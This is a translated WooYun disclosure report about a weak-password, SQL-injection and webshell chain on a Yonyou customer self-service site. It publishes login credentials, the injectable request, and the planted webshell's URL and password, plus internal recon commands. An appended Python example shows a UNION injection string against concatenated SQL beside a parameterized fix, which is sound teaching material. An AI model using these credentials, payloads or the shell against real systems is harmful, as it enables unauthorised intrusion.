
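Vulnerability summary

Bug ID: wooyun-2015-0148402

Title: A Yonyou (用友) system: from weak password to SQL injection to getshell

Vendor: Yonyou Software (用友软件)

Author: 路人甲

Submitted: 2015-10-22 11:13

Fixed: 2015-10-27 11:14

Disclosed: 2015-10-27 11:14

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: the vendor was notified of the vulnerability but ignored it

Source: http://www.wooyun.org; for questions or help, contact [email protected]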

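Vulnerability details

Disclosure status:

2015-10-22: Details sent to the vendor; waiting for the vendor to respond
2015-10-27: The vendor actively ignored the vulnerability; details disclosed to the public

Brief description:

Weak password, SQL injection, getshell

Detailed description:

System address: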
http://vip.ufida.com.cn/Frame/Index.aspx

Weak-password account: adminnc
Password: adminnc

An injection point was found in the self-service query function (login is required; note that the cookie expires).

GET http://vip.ufida.com.cn/RepositorySearchInfo/DoctInfo.aspx?ReposID=38d4a08e-8b79-4de7-8566-30aecfb1d56f HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: http://vip.ufida.com.cn/RepositorySearchInfo/DoctList.aspx?Type=MainPageClick
Accept-Language: zh-CN
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: vip.ufida.com.cn
Connection: Keep-Alive
Cookie: ASP.NET_SessionId=szvzcr45nfresnqlzjhbtsqe


UNION is supported
sa privileges

Proof of vulnerability:

The internal network is reachable

After locating the web root path, a shell was written

http://vip.ufida.com.cn/wooyun.aspx


Password: wpp

With UNION supported, it goes quickly

D:\E_data\战略客户自助系统网站\wwwroot\> arp -a


D:\E_data\战略客户自助系统网站\wwwroot\> net view

Remediation:

Use strong passwords, use parameterized queries, and delete the shell
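
The parameterized-query fix named above, shown beside the concatenated form, as an added example that is not code from the report or from the vendor. Python's sqlite3 stands in for the ASP.NET/SQL Server stack, and the table names, column names and sample rows are constructed; only the ReposID value comes from the request shown in the report.

```python
import sqlite3
import uuid

# ReposID value from the request shown in the report; all other data is constructed.
KNOWN_ID = "38d4a08e-8b79-4de7-8566-30aecfb1d56f"

def make_db():
    # Hypothetical schema: a document table plus an unrelated sensitive table.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE docs (repos_id TEXT PRIMARY KEY, title TEXT)")
    db.execute("CREATE TABLE accounts (login TEXT, secret TEXT)")
    db.execute("INSERT INTO docs VALUES (?, ?)", (KNOWN_ID, "Installation guide"))
    db.execute("INSERT INTO accounts VALUES ('svc_user', 'constructed-secret')")
    return db

def lookup_vulnerable(db, repos_id):
    # 'Before' form: the request value is concatenated into the SQL text,
    # so the caller controls the statement's structure, not just a value.
    sql = "SELECT title FROM docs WHERE repos_id = '" + repos_id + "'"
    return [row[0] for row in db.execute(sql)]

def lookup_hardened(db, repos_id):
    # 1) Allow-list the shape: ReposID must parse as a GUID.
    try:
        canonical = str(uuid.UUID(repos_id))
    except (ValueError, AttributeError, TypeError):
        raise ValueError("ReposID is not a GUID") from None
    # 2) Bind it as a parameter: the driver passes it as data, never as SQL.
    rows = db.execute("SELECT title FROM docs WHERE repos_id = ?", (canonical,))
    return [row[0] for row in rows]

def demo():
    db = make_db()
    # Constructed input of the kind the report describes (UNION-capable injection).
    crafted = "x' UNION SELECT secret FROM accounts --"
    leaked = lookup_vulnerable(db, crafted)  # rows come from the wrong table
    try:
        lookup_hardened(db, crafted)
        rejected = False
    except ValueError:
        rejected = True
    return leaked, rejected, lookup_hardened(db, KNOWN_ID.upper())

if __name__ == "__main__":
    print(demo())
```

Binding the parameter closes the injection only; the sa privileges noted in the report are a separate least-privilege issue for the application's database login.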

Copyright notice: when reposting, please credit the source, 路人甲@乌云 (WooYun)


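Vulnerability response

Vendor response:

Severity: No impact; ignored by the vendor

Ignored at: 2015-10-27 11:14

Vendor reply:

Vulnerability Rank: 4 (WooYun rating)

Latest status:

None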